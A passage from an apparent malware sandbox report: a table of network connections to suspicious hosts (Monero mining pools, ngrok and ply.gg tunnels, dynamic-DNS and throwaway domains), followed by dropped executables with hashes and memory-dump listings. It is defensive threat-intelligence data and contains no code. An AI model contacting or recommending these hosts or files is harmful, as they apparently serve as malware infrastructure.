| US | 20.83.148.22:80 | tcp | |
| IR | 188.212.145.214:40500 | udp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.35.43:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 214.145.212.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.35.21.104.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 130.193.15.51.in-addr.arpa | udp |
| NL | 51.15.58.224:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | 224.58.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| RU | 37.78.33.95:40500 | udp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | 95.33.78.37.in-addr.arpa | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| KZ | 82.200.169.186:40500 | udp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.138.45.170:17027 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 186.169.200.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| KG | 212.112.107.11:40500 | udp | |
| US | 64.94.85.117:443 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 11.107.112.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 3.138.45.170:17027 | 2.tcp.ngrok.io | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| AO | 129.122.183.25:40500 | udp | |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.229.41:443 | bbuseruploads.s3.amazonaws.com | tcp |
| UZ | 90.156.163.91:40500 | tcp | |
| US | 8.8.8.8:53 | 25.183.122.129.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| TH | 110.164.203.191:7000 | tcp | |
| RU | 78.36.17.105:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 3.138.45.170:17027 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 105.17.36.78.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | ywxww.net | udp |
| CN | 60.191.236.246:820 | ywxww.net | tcp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| YE | 94.26.196.74:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 74.196.26.94.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 3.138.45.170:8080 | 2.tcp.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| IR | 93.119.90.81:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | 81.90.119.93.in-addr.arpa | udp |
| YE | 134.35.126.112:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| IR | 46.100.82.131:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| YE | 178.130.115.35:40500 | udp | |
| US | 64.94.85.117:443 | tcp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | 35.115.130.178.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| MX | 189.133.11.24:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 24.11.133.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| IR | 5.74.223.211:40500 | udp | |
| GB | 2.101.182.195:40500 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 211.223.74.5.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| IR | 151.243.58.90:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | 90.58.243.151.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IN | 59.91.192.115:40500 | udp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | 115.192.91.59.in-addr.arpa | udp |
| YE | 134.35.104.95:40500 | udp | |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| US | 193.222.96.100:5555 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 95.104.35.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| IR | 217.219.180.62:40500 | udp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | 62.180.219.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| UZ | 213.230.124.7:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| PK | 39.42.48.119:40500 | udp | |
| RU | 62.113.117.95:4449 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 119.48.42.39.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| KZ | 5.76.2.36:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 36.2.76.5.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| UA | 212.22.213.217:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 3.128.107.74:17027 | 2.tcp.ngrok.io | tcp |
| US | 193.222.96.100:5555 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 217.213.22.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| SY | 95.212.73.0:40500 | udp | |
| RU | 62.113.117.95:4449 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| KZ | 95.59.33.46:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 37.78.33.95:40500 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | 0.73.212.95.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 52.14.18.129:17027 | 2.tcp.ngrok.io | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| IR | 5.239.109.92:40500 | udp | |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.177.228.237:40500 | udp | |
| US | 8.8.8.8:53 | 92.109.239.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.25:13686 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 237.228.177.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| IR | 2.176.95.244:40500 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| BA | 77.221.20.139:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 139.20.221.77.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 193.222.96.100:5555 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 52.14.18.129:8080 | 2.tcp.ngrok.io | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| IR | 46.248.34.105:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| US | 8.8.8.8:53 | 105.34.248.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| MX | 189.164.170.136:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| NL | 51.15.89.13:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 136.170.164.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.89.15.51.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| YE | 46.35.79.193:40500 | tcp | |
| KZ | 2.135.21.142:40500 | udp | |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 142.21.135.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| RU | 62.113.117.95:4449 | tcp | |
| RU | 37.21.118.106:40500 | udp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:8808 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | 106.118.21.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| UZ | 89.249.62.92:40500 | udp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | 92.62.249.89.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| AO | 154.118.201.198:40500 | udp | |
| NL | 89.105.223.196:29862 | tcp | |
| KZ | 89.218.218.206:40500 | tcp | |
| US | 8.8.8.8:53 | 198.201.118.154.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | hseda.com | udp |
| CN | 211.149.230.178:80 | hseda.com | tcp |
| KZ | 2.133.136.145:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 64.94.85.117:443 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 8.8.8.8:53 | 145.136.133.2.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17027 | 2.tcp.ngrok.io | tcp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| YE | 46.161.233.39:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 52.14.18.129:17027 | 2.tcp.ngrok.io | tcp |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| TH | 110.164.203.191:7000 | tcp | |
| SY | 82.137.218.134:40500 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| KZ | 2.135.217.22:40500 | udp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 22.217.135.2.in-addr.arpa | udp |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| KZ | 82.200.172.118:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 118.172.200.82.in-addr.arpa | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| RU | 185.215.113.25:13686 | tcp | |
| KZ | 5.251.47.42:40500 | udp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | 42.47.251.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 104.219.239.11:6969 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| SY | 88.86.12.98:40500 | tcp | |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| TH | 110.164.203.191:7000 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| RU | 185.215.113.25:13686 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 3.128.107.74:8808 | 2.tcp.ngrok.io | tcp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| GR | 85.73.234.113:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| SY | 178.253.102.214:40500 | tcp | |
| US | 8.8.8.8:53 | reddemon.xyz | udp |
| US | 8.8.8.8:53 | fivexc5vs.top | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 66.29.153.21:443 | reddemon.xyz | tcp |
| US | 8.8.8.8:53 | 113.234.73.85.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| NL | 89.105.223.196:29862 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 3.128.107.74:17027 | 2.tcp.ngrok.io | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 21.153.29.66.in-addr.arpa | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 89.105.223.196:29862 | tcp | |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.25:13686 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| MX | 189.133.187.71:40500 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
Files
memory/5016-0-0x000000007478E000-0x000000007478F000-memory.dmp
memory/5016-1-0x0000000000B10000-0x0000000000B18000-memory.dmp
memory/5016-2-0x00000000054C0000-0x000000000555C000-memory.dmp
memory/5016-3-0x0000000074780000-0x0000000074F30000-memory.dmp
memory/5016-4-0x000000007478E000-0x000000007478F000-memory.dmp
memory/5016-5-0x0000000074780000-0x0000000074F30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe
| MD5 | 0d43698dffc5ee744f805a699df25c00 |
| SHA1 | c914a0238381f03d2558bedd423228ba3e4e0040 |
| SHA256 | de14c3b860519dc781aaee813d4fa3adc67d7653c544327f8d26d5b386564712 |
| SHA512 | 57ffb5585ba3452ef039b59e7ac6c0484387aa37fca93b87e4ef49800d12aef338df010a5b8c87d451484ca0b2f0850ce304858a446247d2b7ed1bb280c1828f |
memory/4984-19-0x0000000000401000-0x00000000004B7000-memory.dmp
memory/4984-16-0x0000000000400000-0x00000000004D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-UV0IP.tmp\utility-inst.tmp
| MD5 | 5a617f74245e27297419874956a3ff3e |
| SHA1 | 2cbf5440d087f181bd3aa1f2cc0cd5991eb23e24 |
| SHA256 | b0d7bc97394fffea516cd704377d97419b784cbf7acb694c6a7736b89f916b58 |
| SHA512 | 22b96898a133cf57fb71ad76a97852f750a77cb1eb90244b88151e4f087d86ad9ef348a8d2cfe410bc2a6a12440238fcd8a9acb6c8724036908d7cdf55177734 |
memory/2844-23-0x0000000000400000-0x000000000071C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-ERL4L.tmp\idp.dll
| MD5 | 55c310c0319260d798757557ab3bf636 |
| SHA1 | 0892eb7ed31d8bb20a56c6835990749011a2d8de |
| SHA256 | 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed |
| SHA512 | e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57 |
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
| MD5 | 1ec718ada22e61a5bbbc2407a842b95b |
| SHA1 | c3cb7876db3734c686b64a7bf83984bf61a2a9ef |
| SHA256 | 2e3bc4c6b0789469f9b7fe876adbc47b5b22f6b15ec7dff70ad588d838937677 |
| SHA512 | ccc2b06edd4b724eba92f251bc62df424c61ea0668c06b06080a1206021889b5791855672f422ecfe889aba6d8b4f8fccf6ba23eddf358e7d84056a549e5fb8f |
memory/4804-37-0x0000000004AE0000-0x0000000004B16000-memory.dmp
memory/4804-38-0x00000000051B0000-0x00000000057D8000-memory.dmp
memory/4804-45-0x0000000005940000-0x00000000059A6000-memory.dmp
memory/4804-44-0x00000000058D0000-0x0000000005936000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olc5eiqn.jys.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4984-52-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/2844-43-0x0000000000400000-0x000000000071C000-memory.dmp
memory/4804-42-0x0000000005830000-0x0000000005852000-memory.dmp
memory/4804-57-0x0000000005B80000-0x0000000005ED4000-memory.dmp
memory/4804-58-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/4804-59-0x0000000006100000-0x000000000614C000-memory.dmp
memory/4804-60-0x0000000007070000-0x00000000070A2000-memory.dmp
memory/4804-61-0x000000006F8C0000-0x000000006F90C000-memory.dmp
memory/4804-71-0x0000000006690000-0x00000000066AE000-memory.dmp
memory/4804-72-0x00000000070B0000-0x0000000007153000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\test-again.exe
| MD5 | d9fd5136b6c954359e8960d0348dbd58 |
| SHA1 | 44800a8d776fd6de3e4246a559a5c2ac57c12eeb |
| SHA256 | 55eb3a38362b44d13ae622cc81df37d1d7089c15f6608fd46543df395569e816 |
| SHA512 | 86add0c5fd4d7eff19ce3828c2fe8501d51566cad047d7e480acf3e0bc227e3bda6a27aa65f7b2fd77d34cd009de73c98014d0323d8cf35ba06e5451eee5e9b0 |
memory/4804-81-0x0000000007A30000-0x00000000080AA000-memory.dmp
memory/4804-82-0x00000000073E0000-0x00000000073FA000-memory.dmp
memory/4804-83-0x0000000007440000-0x000000000744A000-memory.dmp
memory/4804-84-0x0000000007670000-0x0000000007706000-memory.dmp
memory/4804-85-0x00000000075E0000-0x00000000075F1000-memory.dmp
memory/4804-86-0x0000000007620000-0x000000000762E000-memory.dmp
memory/1608-87-0x0000000000930000-0x0000000000984000-memory.dmp
memory/4804-88-0x0000000007630000-0x0000000007644000-memory.dmp
memory/1608-89-0x00007FFB38CF0000-0x00007FFB38D7D000-memory.dmp
memory/1608-90-0x0000000000090000-0x0000000000093000-memory.dmp
memory/4804-91-0x0000000007710000-0x000000000772A000-memory.dmp
memory/4804-92-0x0000000007660000-0x0000000007668000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
| MD5 | 1b99f0bf9216a89b8320e63cbd18a292 |
| SHA1 | 6a199cb43cb4f808183918ddb6eadc760f7cb680 |
| SHA256 | 5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357 |
| SHA512 | 02b7f410c6ccfd7d43159287424916a310b7e82c91cdb85eaeade16cf5614265a8bdcce8e6dcc2240ea54930cfb190f26ada3d5c926b50617a9826197f9cf382 |
memory/4872-104-0x0000017CD82D0000-0x0000017CD841A000-memory.dmp
memory/4872-105-0x0000017CF2AB0000-0x0000017CF2BB6000-memory.dmp
memory/4872-127-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-131-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-163-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-161-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-159-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-157-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-153-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-151-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-149-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-145-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-143-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-141-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-139-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-135-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-133-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
memory/4872-129-0x0000017CF2AB0000-0x0000017CF2BB1000-memory.dmp
